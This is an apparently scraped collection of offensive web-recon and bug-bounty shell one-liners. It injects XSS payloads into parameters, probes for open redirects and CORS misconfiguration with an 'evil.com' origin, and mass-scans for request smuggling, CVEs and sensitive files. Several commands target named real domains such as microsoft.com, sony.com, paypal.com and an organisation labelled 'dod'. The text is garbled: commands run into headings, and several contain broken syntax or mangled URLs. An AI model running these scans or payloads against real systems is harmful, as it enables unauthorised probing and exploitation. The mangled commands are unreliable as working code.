echo 'dod' | metabigor net --org -v | awk '{print $3}' | sed 's/[[0-9]]\+\.//g' | xargs -I@ sh -c 'prips @ | hakrevdns | anew'waybackurls $target | grep '=' |qsreplace '"><script>alert(1)</script>' | while read host do ; do curl -s --path-as-is --insecure "$host" | grep -qs "<script>alert(1)</script>" && echo "$host \033[0;31m" Vulnerable;donewaybackurls microsoft.com | grep '=' |qsreplace '"><svg/onload=alert(1337)>'| while read host do ; do curl -s --path-as-is --insecure "$host" | grep -qs "<svg/onload=alert(1337)>" && echo "$host \033[0;31m" Vulnerable;doneOpenRedirect
export LHOST="http://localhost"; gau $1 | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"'
XSS
gospider -S targets_urls.txt -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -e "code-200" | awk '{print $5}'| grep "=" | qsreplace -a | dalfox pipe | tee result.txtFind JS Files
assetfinder site.com | gau|egrep -v '(.css|.png|.jpeg|.jpg|.svg|.gif|.wolf)'|while read url; do vars=$(curl -s $url | grep -Eo "var [a-zA-Zo-9_]+" |sed -e 's, 'var','"$url"?',g' -e 's/ //g'|grep -v '.js'|sed 's/.*/&=xss/g'):echo -e "\e[1;33m$url\n" "\e[1;32m$vars";done
Google dorks
site:$target ext:odt |ext:rtf |ext:sxw |ext:bkf |ext:bkp |ext:old |ext:backup |ext:psw |ext:bak |ext:log |ext:logs |ext:csv |ext:xls |ext:xlsx |ext:doc |ext:docx |ext:docsSensetive data in JS files
gau $target | grep -iE '\.js' | grep -ivE '\.json' | sort -u > $target.JS.txt; cat $target.JS.txt | while read line ; do python3 http://linkfinder.py -i $line -o cli; fi; doneCVE Scanner
#!/bin/bash
target=$1
wget -nv -nc http://chaos-data.projectdiscovery.io/$target.zip; unzip $target.zip ; cat *.txt | httpx -silent -threads 300 > $target.alive; cat $target.alive | jaeles scan -s ~/jaeles-signatures/cves/ -c 100 ; nuclei -l $target.alive -t ~/nuclei-templates/cvesSmuggler Finder
assetfinder $target > subs.txt; cat subs.txt | httpx -threads 300 -silent | python3 smuggler.py
shodan domain http://sony.com | awk '{print $3}' | httpx -silent | rush -j 3 'python3 smuggler.py -u {}'Automation tool for recon, bug hunting / pentest
cat hosts.txt | nuclei -t /path/to/nuclei-templates -severity critical,high,mediumSensetive Finder
domain="http://paypal.com";shodan domain $domain | awk -v domain="$domain" '{print $1"."domain}'| httpx -threads 300 | anew shodanHostsUp | xargs -I@ -P3 sh -c 'jaeles -c 300 scan -s ~/.jaeles/base-signatures/sensitive/ -u @| anew JaelesShodanHosts'XSS
shodan domain TARGET | awk '{print $3}'| httpx -silent | xargs -I@ sh -c 'python3 xsstrike.py -u @ --crawl'CVE
wget https://chaos-data.projectdiscovery.io/lime.zip -nv ; unzip http://lime.zip ; cat *.txt >> lime.txt ; cat lime.txt | httpx -silent -threads 200 | gau -subs -retries 2| anew | rush -j 3 'jaeles scan -s /jaeles-signatures/ -u {}'JS Finder
cat target.txt | httpx -silent | subjs | anew
gau $target |grep -iE '\.js'|grep -ivE '\.json'| sort -u >> attJS.txtCORS Scanner
assetfinder http://fitbit.com | httpx -threads 300 -follow-redirects -silent | rush -j200 'curl -m5 -s -I -H "Origin:http://evil.com" {} | [[ $(grep -c "http://evil.com") -gt 0 ]] && printf "\n\033[0;32m[VUL TO CORS] - {}\e[m"' 2>/dev/null